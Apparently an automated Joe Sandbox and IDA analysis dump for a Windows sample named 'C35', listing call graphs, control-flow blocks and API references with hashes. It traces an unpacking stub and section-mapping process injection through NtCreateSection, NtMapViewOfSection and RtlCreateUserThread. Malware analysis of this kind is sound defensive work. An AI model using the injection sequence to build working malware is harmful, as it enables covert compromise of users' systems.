5081 4016e4 5079->5081 5082 401733 NtMapViewOfSection 5080->5082 5080->5084 5081->5078 5083 40175a NtMapViewOfSection 5082->5083 5082->5084 5083->5084 4768 402f16 4769 402f1a 4768->4769 4771 402fa2 4769->4771 4772 401991 4769->4772 4773 4019a0 4772->4773 4774 4019d8 Sleep 4773->4774 4776 4019f3 4774->4776 4777 4014c4 4774->4777 4776->4771 4779 4014d3 4777->4779 4778 401571 4778->4776 4779->4778 4780 401660 NtDuplicateObject 4779->4780 4780->4778 4781 40167d NtCreateSection 4780->4781 4782 4016a3 NtMapViewOfSection 4781->4782 4783 4016fd NtCreateSection 4781->4783 4782->4783 4784 4016c6 NtMapViewOfSection 4782->4784 4783->4778 4785 401729 4783->4785 4784->4783 4786 4016e4 4784->4786 4785->4778 4787 401733 NtMapViewOfSection 4785->4787 4786->4783 4787->4778 4788 40175a NtMapViewOfSection 4787->4788 4788->4778 4789 6b003c 4790 6b0049 4789->4790 4802 6b0e0f SetErrorMode SetErrorMode 4790->4802 4795 6b0265 4796 6b02ce VirtualProtect 4795->4796 4798 6b030b 4796->4798 4797 6b0439 VirtualFree 4800 6b04be LoadLibraryA 4797->4800 4798->4797 4801 6b08c7 4800->4801 4803 6b0223 4802->4803 4804 6b0d90 4803->4804 4805 6b0dad 4804->4805 4806 6b0dbb GetPEB 4805->4806 4807 6b0238 VirtualAlloc 4805->4807 4806->4807 4807->4795 4951 40b2d9 4952 40b2e9 4951->4952 4953 40b2fc RtlLeaveCriticalSection 4951->4953 5027 402e9a 5028 402e5f 5027->5028 5029 402eaf 5027->5029 5030 402fa2 5029->5030 5031 401991 8 API calls 5029->5031 5031->5030 5032 40b562 5033 40b580 __lseeki64_nolock 5032->5033 5034 40b599 SetFilePointer 5033->5034 5036 40b588 5033->5036 5035 40b5b1 GetLastError 5034->5035 5034->5036 5035->5036 4966 40b4e4 4969 40b3cd 4966->4969 4970 40b3e9 4969->4970 4971 40b3e0 4969->4971 4971->4970 4972 40b440 4971->4972 4973 40b4bd MultiByteToWideChar 4971->4973 4972->4970 4974 40b453 MultiByteToWideChar 4972->4974 4973->4970 4974->4970 4975 402ee7 4977 402ef9 4975->4977 4976 402fa2 4977->4976 4978 401991 8 API calls 4977->4978 4978->4976 5121 4019a9 5122 4019a0 5121->5122 5123 4019d8 Sleep 5122->5123 5124 4014c4 7 API calls 5123->5124 5125 4019f3 5123->5125 5124->5125 4913 6b0001 4914 6b0005 4913->4914 4919 6b092b GetPEB 4914->4919 4916 6b0030 4921 6b003c 4916->4921 4920 6b0972 4919->4920 4920->4916 4922 6b0049 4921->4922 4923 6b0e0f 2 API calls 4922->4923 4924 6b0223 4923->4924 4925 6b0d90 GetPEB 4924->4925 4926 6b0238 VirtualAlloc 4925->4926 4927 6b0265 4926->4927 4928 6b02ce VirtualProtect 4927->4928 4930 6b030b 4928->4930 4929 6b0439 VirtualFree 4932 6b04be LoadLibraryA 4929->4932 4930->4929 4933 6b08c7 4932->4933 4826 40b26b 4827 40b278 4826->4827 4828 40b28e RtlEnterCriticalSection 4826->4828 4934 6b0005 4935 6b092b GetPEB 4934->4935 4936 6b0030 4935->4936 4937 6b003c 7 API calls 4936->4937 4938 6b0038 4937->4938 4705 41a170 4708 419d70 4705->4708 4707 41a175 4710 419d90 4708->4710 4709 419d99 GetVolumeInformationA 4709->4710 4710->4709 4711 419e31 4710->4711 4712 419f59 4711->4712 4713 419e4a InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 4711->4713 4714 419f65 SetCommState 4712->4714 4720 419f7e 4712->4720 4715 419e8e 7 API calls 4713->4715 4714->4712 4716 419f37 4715->4716 4717 419f2b ObjectPrivilegeAuditAlarmA 4715->4717 4718 419f40 WaitForSingleObject 4716->4718 4719 419f48 4716->4719 4717->4716 4718->4719 4719->4712 4721 41a046 4720->4721 4722 419f8b 9 API calls 4720->4722 4735 419a40 LocalAlloc 4721->4735 4733 41a019 4722->4733 4726 41a04b LoadLibraryA 4736 419a70 GetModuleHandleW GetProcAddress VirtualProtect 4726->4736 4727 41a09d 4737 419cd0 4727->4737 4729 41a0b9 MoveFileA 4730 41a0a2 4729->4730 4730->4729 4731 41a0e3 InterlockedCompareExchange 4730->4731 4734 41a0fd 4730->4734 4731->4730 4733->4721 4734->4707 4735->4726 4736->4727 4738 419cf9 QueryDosDeviceW 4737->4738 4739 419d0a 4737->4739 4738->4739 4748 419c10 4739->4748 4742 419d25 4751 419c50 4742->4751 4743 419d1d FreeEnvironmentStringsW 4743->4742 4746 419d3c HeapDestroy GetNumaProcessorNode 4747 419d53 4746->4747 4747->4730 4749 419c21 FatalAppExitW GetModuleHandleA 4748->4749 4750 419c33 4748->4750 4749->4750 4750->4742 4750->4743 4752 419c6c 4751->4752 4753 419c5e BuildCommDCBW 4751->4753 4754 419c74 FreeEnvironmentStringsA 4752->4754 4755 419c7c 4752->4755 4753->4755 4754->4755 4756 419cad 4755->4756 4758 419c40 4755->4758 4756->4746 4756->4747 4761 419bc0 4758->4761 4762 419beb 4761->4762 4763 419bdc SetPriorityClass 4761->4763 4762->4755 4763->4762 5037 401975 5038 401979 5037->5038 5039 4014c4 7 API calls 5038->5039 5040 4019f3 5039->5040 4829 40b078 4830 40b084 4829->4830 4831 40b08c 4830->4831 4838 40b6e4 4830->4838 4833 40b0ed __lseeki64_nolock 4834 40b102 FlushFileBuffers 4833->4834 4835 40b119 4833->4835 4834->4835 4836 40b10e GetLastError 4834->4836 4842 40b14f 4835->4842 4836->4835 4839 40b6f0 ___lock_fhandle 4838->4839 4840 40b750 RtlEnterCriticalSection 4839->4840 4841 40b76d 4839->4841 4840->4841 4841->4833 4845 40b784 RtlLeaveCriticalSection 4842->4845 4844 40b157 4844->4831 4845->4844 4808 8b0f37 4811 8b0f47 4808->4811 4812 8b0f56 4811->4812 4815 8b16e7 4812->4815 4816 8b1702 4815->4816 4817 8b170b CreateToolhelp32Snapshot 4816->4817 4818 8b1727 Module32First 4816->4818 4817->4816 4817->4818 4819 8b0f46 4818->4819 4820 8b1736 4818->4820 4822 8b13a6 4820->4822 4823 8b13d1 4822->4823 4824 8b141a 4823->4824 4825 8b13e2 VirtualAlloc 4823->4825 4824->4824 4825->4824

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 419d70-419d8e 1 419d90-419d97 0->1 2 419dc5-419dcb 1->2 3 419d99-419dbf GetVolumeInformationA 1->3 4 419dcd-419dd9 2->4 5 419ddf-419de9 2->5 3->2 4->5 6 419e24-419e2b 5->6 7 419deb-419e1a 5->7 6->1 8 419e31-419e44 6->8 7->6 10 419f59-419f5f 8->10 11 419e4a-419f29 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileW CreatePipe GetEnvironmentStrings WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 8->11 12 419f65-419f73 SetCommState 10->12 15 419f37-419f3e 11->15 16 419f2b-419f31 ObjectPrivilegeAuditAlarmA 11->16 19 419f75-419f7c 12->19 20 419f7e-419f85 12->20 17 419f40-419f42 WaitForSingleObject 15->17 18 419f48-419f56 15->18 16->15 17->18 18->10 19->12 19->20 21 41a046-41a055 call 419a40 20->21 22 419f8b-41a040 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameA GetCommTimeouts 20->22 28 41a057-41a068 21->28 29 41a08d-41a098 LoadLibraryA call 419a70 21->29 22->21 30 41a070-41a080 28->30 35 41a09d-41a0ae call 419cd0 29->35 33 41a082 30->33 34 41a088-41a08b 30->34 33->34 34->29 34->30 40 41a0b0-41a0b7 35->40 41 41a0b9-41a0c7 MoveFileA 40->41 42 41a0cd-41a0d3 40->42 41->42 44 41a0d5 call 419a60 42->44 45 41a0da-41a0e1 42->45 44->45 47 41a0e3-41a0ee InterlockedCompareExchange 45->47 48 41a0f4-41a0fb 45->48 47->48 48->40 50 41a0fd-41a10d 48->50 52 41a110-41a120 50->52 54 41a122 52->54 55 41a129-41a12c 52->55 54->55 55->52 57 41a12e-41a139 55->57 58 41a140-41a145 57->58 59 41a147-41a14d 58->59 60 41a14f-41a155 58->60 59->60 61 41a157-41a164 59->61 60->58 60->61
                                                                                                                              APIs
                                                                                                                              • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00419DBF
                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00419E53
                                                                                                                              • GetFocus.USER32 ref: 00419E59
                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E64
                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 00419E6B
                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00419E73
                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00419E9A
                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00419EA3
                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00419EB9
                                                                                                                              • GetEnvironmentStrings.KERNEL32 ref: 00419EBF
                                                                                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00419F04
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419F13
                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419F1C
                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419F31
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00419F42
                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 00419F69
                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419F9A
                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00419FAE
                                                                                                                              • CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 00419FBF
                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00419FC6
                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00419FCC
                                                                                                                              • GetBinaryType.KERNEL32(0041C400,?), ref: 00419FDE
                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00419FF1
                                                                                                                              • GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A004
                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A00C
                                                                                                                              • LoadLibraryA.KERNELBASE(0041C424), ref: 0041A092
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_40b000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
                                                                                                                              • String ID: k`$}$
                                                                                                                              • API String ID: 4249349521-956986773
                                                                                                                              • Opcode ID: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
                                                                                                                              • Instruction ID: 1ffa0da19b14ee91b85dcd2083993de682bc4a00c742463c13e7108b831189b5
                                                                                                                              • Opcode Fuzzy Hash: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
                                                                                                                              • Instruction Fuzzy Hash: AAA19071802524ABD724DB61DC58FDF7B68EF5D311F00816AF609A2161DB381A85CFED

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 148 4014c4-4014f6 154 4014f9-40150d call 401240 148->154 159 401512-401513 154->159 160 401544-401545 159->160 161 401515-401528 159->161 162 401547 160->162 163 4015bd-4015d4 160->163 161->154 164 40152a-401535 161->164 166 401596-4015a6 162->166 167 401549-40154b 162->167 164->159 165 401537-401543 164->165 165->160 169 4015a8 166->169 167->169 170 40154d-40156d 167->170 172 4015e7-40160a call 401240 170->172 173 40156f 170->173 182 40160c 172->182 183 40160f-401614 172->183 175 401571 173->175 176 4015e2-4015e3 173->176 176->172 182->183 185 40161a-40162b 183->185 186 40193e-401946 183->186 189 401631-40165a 185->189 190 40193c 185->190 186->183 191 40194b-40198e call 401240 186->191 189->190 199 401660-401677 NtDuplicateObject 189->199 190->191 199->190 200 40167d-4016a1 NtCreateSection 199->200 202 4016a3-4016c4 NtMapViewOfSection 200->202 203 4016fd-401723 NtCreateSection 200->203 202->203 205 4016c6-4016e2 NtMapViewOfSection 202->205 203->190 206 401729-40172d 203->206 205->203 208 4016e4-4016fa 205->208 206->190 209 401733-401754 NtMapViewOfSection 206->209 208->203 209->190 211 40175a-401776 NtMapViewOfSection 209->211 211->190 214 40177c 211->214 214->190 216 40177c call 401781 214->216 216->190
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
                                                                                                                              • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                                                              • Opcode Fuzzy Hash: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
                                                                                                                              • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 217 4015d5-4015e4 219 4015f4 217->219 220 4015eb-4015f0 217->220 219->220 221 4015f7-40160a call 401240 219->221 220->221 224 40160c 221->224 225 40160f-401614 221->225 224->225 227 40161a-40162b 225->227 228 40193e-401946 225->228 231 401631-40165a 227->231 232 40193c 227->232 228->225 233 40194b-40198e call 401240 228->233 231->232 241 401660-401677 NtDuplicateObject 231->241 232->233 241->232 242 40167d-4016a1 NtCreateSection 241->242 244 4016a3-4016c4 NtMapViewOfSection 242->244 245 4016fd-401723 NtCreateSection 242->245 244->245 247 4016c6-4016e2 NtMapViewOfSection 244->247 245->232 248 401729-40172d 245->248 247->245 250 4016e4-4016fa 247->250 248->232 251 401733-401754 NtMapViewOfSection 248->251 250->245 251->232 253 40175a-401776 NtMapViewOfSection 251->253 253->232 256 40177c 253->256 256->232 258 40177c call 401781 256->258 258->232
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
                                                                                                                              • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                                                              • Opcode Fuzzy Hash: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
                                                                                                                              • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 259 4015df-4015e4 261 4015f4 259->261 262 4015eb-4015f0 259->262 261->262 263 4015f7-40160a call 401240 261->263 262->263 266 40160c 263->266 267 40160f-401614 263->267 266->267 269 40161a-40162b 267->269 270 40193e-401946 267->270 273 401631-40165a 269->273 274 40193c 269->274 270->267 275 40194b-40198e call 401240 270->275 273->274 283 401660-401677 NtDuplicateObject 273->283 274->275 283->274 284 40167d-4016a1 NtCreateSection 283->284 286 4016a3-4016c4 NtMapViewOfSection 284->286 287 4016fd-401723 NtCreateSection 284->287 286->287 289 4016c6-4016e2 NtMapViewOfSection 286->289 287->274 290 401729-40172d 287->290 289->287 292 4016e4-4016fa 289->292 290->274 293 401733-401754 NtMapViewOfSection 290->293 292->287 293->274 295 40175a-401776 NtMapViewOfSection 293->295 295->274 298 40177c 295->298 298->274 300 40177c call 401781 298->300 300->274
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
                                                                                                                              • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                                                              • Opcode Fuzzy Hash: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
                                                                                                                              • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 301 4015f2-4015f4 303 4015f7-40160a call 401240 301->303 304 4015eb-4015f0 301->304 307 40160c 303->307 308 40160f-401614 303->308 304->303 307->308 310 40161a-40162b 308->310 311 40193e-401946 308->311 314 401631-40165a 310->314 315 40193c 310->315 311->308 316 40194b-40198e call 401240 311->316 314->315 324 401660-401677 NtDuplicateObject 314->324 315->316 324->315 325 40167d-4016a1 NtCreateSection 324->325 327 4016a3-4016c4 NtMapViewOfSection 325->327 328 4016fd-401723 NtCreateSection 325->328 327->328 330 4016c6-4016e2 NtMapViewOfSection 327->330 328->315 331 401729-40172d 328->331 330->328 333 4016e4-4016fa 330->333 331->315 334 401733-401754 NtMapViewOfSection 331->334 333->328 334->315 336 40175a-401776 NtMapViewOfSection 334->336 336->315 339 40177c 336->339 339->315 341 40177c call 401781 339->341 341->315
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
                                                                                                                              • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                                                              • Opcode Fuzzy Hash: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
                                                                                                                              • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 342 4015e6-40160a call 401240 347 40160c 342->347 348 40160f-401614 342->348 347->348 350 40161a-40162b 348->350 351 40193e-401946 348->351 354 401631-40165a 350->354 355 40193c 350->355 351->348 356 40194b-40198e call 401240 351->356 354->355 364 401660-401677 NtDuplicateObject 354->364 355->356 364->355 365 40167d-4016a1 NtCreateSection 364->365 367 4016a3-4016c4 NtMapViewOfSection 365->367 368 4016fd-401723 NtCreateSection 365->368 367->368 370 4016c6-4016e2 NtMapViewOfSection 367->370 368->355 371 401729-40172d 368->371 370->368 373 4016e4-4016fa 370->373 371->355 374 401733-401754 NtMapViewOfSection 371->374 373->368 374->355 376 40175a-401776 NtMapViewOfSection 374->376 376->355 379 40177c 376->379 379->355 381 40177c call 401781 379->381 381->355
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
                                                                                                                              • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                                                              • Opcode Fuzzy Hash: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
                                                                                                                              • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 383 403043-403067 384 40319a-40319f 383->384 385 40306d-403085 383->385 385->384 386 40308b-40309c 385->386 387 40309e-4030a7 386->387 388 4030ac-4030ba 387->388 388->388 389 4030bc-4030c3 388->389 390 4030e5-4030ec 389->390 391 4030c5-4030e4 389->391 392 40310e-403111 390->392 393 4030ee-40310d 390->393 391->390 394 403113-403116 392->394 395 40311a 392->395 393->392 394->395 396 403118 394->396 395->387 397 40311c-403121 395->397 396->397 397->384 398 403123-403126 397->398 398->384 399 403128-403197 RtlCreateUserThread NtTerminateProcess 398->399 399->384
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_C35.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1921587553-0
                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 63 6b003c-6b0047 64 6b0049 63->64 65 6b004c-6b0263 call 6b0a3f call 6b0e0f call 6b0d90 VirtualAlloc 63->65 64->65 80 6b028b-6b0292 65->80 81 6b0265-6b0289 call 6b0a69 65->81 83 6b02a1-6b02b0 80->83 85 6b02ce-6b03c2 VirtualProtect call 6b0cce call 6b0ce7 81->85 83->85 86 6b02b2-6b02cc 83->86 92 6b03d1-6b03e0 85->92 86->83 93 6b0439-6b04b8 VirtualFree 92->93 94 6b03e2-6b0437 call 6b0ce7 92->94 96 6b04be-6b04cd 93->96 97 6b05f4-6b05fe 93->97 94->92 99 6b04d3-6b04dd 96->99 100 6b077f-6b0789 97->100 101 6b0604-6b060d 97->101 99->97 103 6b04e3-6b0505 99->103 104 6b078b-6b07a3 100->104 105 6b07a6-6b07b0 100->105 101->100 106 6b0613-6b0637 101->106 114 6b0517-6b0520 103->114 115 6b0507-6b0515 103->115 104->105 107 6b086e-6b08be LoadLibraryA 105->107 108 6b07b6-6b07cb 105->108 109 6b063e-6b0648 106->109 113 6b08c7-6b08f9 107->113 111 6b07d2-6b07d5 108->111 109->100 112 6b064e-6b065a 109->112 116 6b07d7-6b07e0 111->116 117 6b0824-6b0833 111->117 112->100 118 6b0660-6b066a 112->118 119 6b08fb-6b0901 113->119 120 6b0902-6b091d 113->120 121 6b0526-6b0547 114->121 115->121 122 6b07e2 116->122 123 6b07e4-6b0822 116->123 125 6b0839-6b083c 117->125 124 6b067a-6b0689 118->124 119->120 129 6b054d-6b0550 121->129 122->117 123->111 126 6b068f-6b06b2 124->126 127 6b0750-6b077a 124->127 125->107 128 6b083e-6b0847 125->128 130 6b06ef-6b06fc 126->130 131 6b06b4-6b06ed 126->131 127->109 132 6b084b-6b086c 128->132 133 6b0849 128->133 135 6b05e0-6b05ef 129->135 136 6b0556-6b056b 129->136 137 6b074b 130->137 138 6b06fe-6b0748 130->138 131->130 132->125 133->107 135->99 139 6b056f-6b057a 136->139 140 6b056d 136->140 137->124 138->137 141 6b059b-6b05bb 139->141 142 6b057c-6b0599 139->142 140->135 147 6b05bd-6b05db 141->147 142->147 147->129
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
